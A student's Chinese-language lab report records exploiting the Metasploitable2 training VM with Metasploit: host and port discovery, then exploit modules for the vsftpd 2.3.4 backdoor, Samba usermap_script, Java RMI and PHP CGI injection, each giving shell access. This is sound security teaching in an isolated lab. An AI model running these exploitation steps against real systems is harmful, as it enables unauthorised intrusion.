20222407 2024-2025-1 《网络与系统攻防技术》实验六实验报告
1.实验内容
1.1 本周学习内容回顾
Metasploit 是一个功能强大的渗透测试框架,广泛应用于网络安全领域。它为安全专家、渗透测试人员和红队提供了一个全面的工具集,支持漏洞利用、攻击模拟和安全评估。Metasploit 提供了丰富的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。除了漏洞利用,它还具备强大的后渗透功能,如键盘记录、文件上传下载、网络嗅探等。通过与其他安全工具的集成,Metasploit 能够帮助用户快速识别、利用并修复潜在的安全漏洞,是网络安全行业中的重要工具之一。
1.2 实验要求
本实践目标是掌握metasploit的用法。
指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成下面实验内容。
查询靶机IP地址,得到结果为192.168.1.114
查询kail ip:192.1.113
ping:
2.实验过程
2.1 前期渗透
2.1.1 主机发现(可用Aux中的arp_sweep,search一下就可以use)
search arp_sweep
use 0
set RHOSTS 192.168.1.0/24
set THREADS 30 run
成功查询到靶机(192.168.1.114)
2.1.2 端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等
search portscan/tcp
set ROHSTS 192.168.1.114
run
成功扫描出tcp端口。
2.1.3 扫描系统版本、漏洞
search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.1.114
run
目标主机运行的是一个较旧的 Samba 版本(3.0.20),且使用 SMBv1,可能存在一些已知漏洞。
2.2 Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.1.114
run
run攻击成功执行后,再输入uname –a、 pwd、 id等命令 验证。
2.3 SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.1.114
exploit
利用成功 执行uname –a验证
2.4 Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
search exploit/multi/misc/java_rmi_server
use 0
show options //查看配置参数
set RHOST 192.168.1.114
exploit
运行成功,输入sessions -i 3进入任务
再输入shell,利用whoami命令验证,得到结果root。
2.5 PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.1.114
Exploit
攻击成功,输入dir验证。
3.问题及解决方案
一开始扫描的时候,没有开root权限导致无法攻击成功。
4.学习感悟、思考等
在进行 Metasploit 攻击渗透实践后,深感网络安全领域如同一个充满隐秘通道和坚固壁垒的迷宫。这种实践让我认识到,每一个看似安全的系统都可能存在潜在的脆弱点,而 Metasploit 这样强大的工具就像一把双刃剑。一方面,它让我们了解到攻击者可能利用的手段,从信息收集到漏洞利用,再到获取目标系统的控制权,步骤的连贯性和简易性令人警醒。这使我们明白,在构建防御体系时,不能放过任何一个环节,必须要有全面且深入的安全策略。
另一方面,它也强调了道德责任的重要性。拥有这样的技术能力,如果被用于恶意目的,可能会对个人、企业乃至整个社会造成不可估量的损害。这让我意识到网络安全从业者不仅要有精湛的技术,更要有坚定的道德操守,要将自己的知识用于保护信息资产,而不是破坏。这种实践如同一面镜子,反射出网络安全攻防背后复杂的人性和伦理问题。
同时,实践也凸显了持续学习的必要性。网络环境不断变化,新的漏洞和攻击方式层出不穷,我们必须时刻保持警惕,不断更新知识,才能在这场网络安全的较量中保持领先,守护好网络世界的安全防线。